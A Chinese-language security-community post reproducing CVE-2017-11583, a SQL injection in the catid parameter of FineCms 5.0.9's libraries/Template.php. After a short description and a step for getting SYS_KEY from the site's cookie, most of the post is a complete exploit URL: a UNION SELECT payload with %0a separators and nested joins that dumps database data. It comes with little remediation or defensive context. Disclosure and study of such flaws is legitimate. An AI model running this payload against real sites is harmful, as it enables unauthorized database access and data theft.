FineCms 5.0.9通过libraries/Template.php中的catid参数SQL注入漏洞CVE-2017-11583

漏洞描述

dayrui FineCms 5.0.9 通过在对libraries/Template.php action=related 请求中的catid参数进行SQL注入漏洞CVE-2017-11583
 


 

漏洞复现

文件/finecms/dayrui/libraries/Template.php函数 list_tag action=related,该catid参数被分割','并插入到 sql 查询中,无需任何验证、清理,我们可以使用它获取所有数据库。

查看网站并从库克获取 SYS_KEY

有效载荷是

http://finecms.com/index.php?c=api&m=data2&auth={md5(SYS_KEY)}¶m=action=related%20module=news%20tag=1,2%20catid=1,12))%0aand%0a0%0aunion%0aselect%0a*%0afrom(((((((((((((((((((select(user()))a)join(select(2))b)join(select(3))c)join(select(4))d)join(select(5))e)join(select(6))f)join(select(7))g)join(select(8))h)join(select(9))i)join(select(10))j)join(select(11))k)join(select(12))l)join(select(13))m)join(select(14))n)join(select(15))o)join(select(16))p)join(select(17))q)join(select(18))x)%23

图片[1]-FineCms 5.0.9通过libraries/Template.php中的catid参数SQL注入漏洞CVE-2017-11583-孤勇者社区
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞12赞赏 分享
评论 共2条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像谨张0
    • 头像张王0